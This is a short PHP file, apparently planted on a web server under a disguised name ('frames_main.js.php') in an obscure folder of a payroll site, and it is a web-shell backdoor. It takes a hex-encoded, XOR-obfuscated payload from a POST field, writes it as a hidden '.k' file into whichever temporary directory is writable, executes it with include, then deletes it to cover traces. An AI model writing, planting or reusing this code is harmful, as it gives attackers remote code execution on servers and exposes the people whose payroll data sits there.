File: //home/burhbrzf/payroll.burhanrentacar.net/lqpjvnc/frames_main.js.php
<?php
if(isset($_POST["bind"]) ? true : false){
$ent = hex2bin($_POST["bind"]);
$hld= ''; $h = 0; do{$hld .= chr(ord($ent[$h]) ^ 89);$h++;} while($h < strlen($ent));
$pointer = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", session_save_path(), getenv("TMP"), "/dev/shm", getenv("TEMP"), "/tmp", getcwd()]);
while ($pgrp = array_shift($pointer)) {
if (is_dir($pgrp) && is_writable($pgrp)) {
$val = "$pgrp/.k";
$success = file_put_contents($val, $hld);
if ($success) {
include $val;
@unlink($val);
exit;}
}
}
}